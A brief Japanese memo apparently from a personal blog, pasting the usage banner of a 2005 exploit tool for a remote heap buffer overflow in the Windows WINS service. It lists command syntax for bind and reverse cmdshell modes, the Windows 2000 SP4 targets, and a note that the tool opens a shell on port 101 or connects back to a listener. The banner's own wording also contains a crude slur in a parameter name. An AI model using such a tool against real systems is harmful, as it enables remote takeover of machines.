WINSのやつ

メモだけ。

C:\>101_WINS\101_WINS.exe"
===================================================[v0.2]====
============Windows Internet Name Service (WINS)=============
============Remote Heap Buffer Overflow Exploit==============
======coded by class101=============[Hat-Squad.com 2005]=====
=============================================================

[+] . 101_WINS.exe Target VulnIP (bind mode)
[+] . 101_WINS.exe Target VulnIP VulnPORT (bind mode)
[+] . 101_WINS.exe Target VulnIP VulnPORT GayIP GayPORT (reverse mode)

TARGETS:
[+] 1. Win2k SP4 Server English (*) - v5.0.2195
[+] 1. Win2k SP4 Advanced Server English (*) - v5.0.2195

NOTE:
The exploit bind a cmdshell port 101 or
reverse a cmdshell on your listener.
A wildcard (*) mean tested working, else, supposed working.
A symbol (-) mean all.
Compilation msvc6, cygwin, Linux.